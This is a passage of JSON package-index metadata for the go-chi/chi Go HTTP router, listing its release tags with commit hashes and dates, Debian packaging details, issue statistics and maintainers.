o-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.267Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/golang-github-go-chi-chi?arch=source\u0026distro=debian-13\u0026repository_url=https://packages.debian.org/trixie","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"debian-13","url":"https://packages.debian.org/trixie","ecosystem":"debian","default":false,"packages_count":38024,"maintainers_count":0,"namespaces_count":4,"keywords_count":1985,"github":"debian","metadata":{"codename":"trixie","funded_packages_count":1208},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.448Z","updated_at":"2026-08-12T05:05:15.557Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/namespaces"}},{"id":9868092,"name":"github.com/GO-CHI/chi","ecosystem":"go","description":"","homepage":"https://github.com/GO-CHI/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/GO-CHI/chi","keywords_array":[],"namespace":"github.com/GO-CHI","versions_count":8,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_s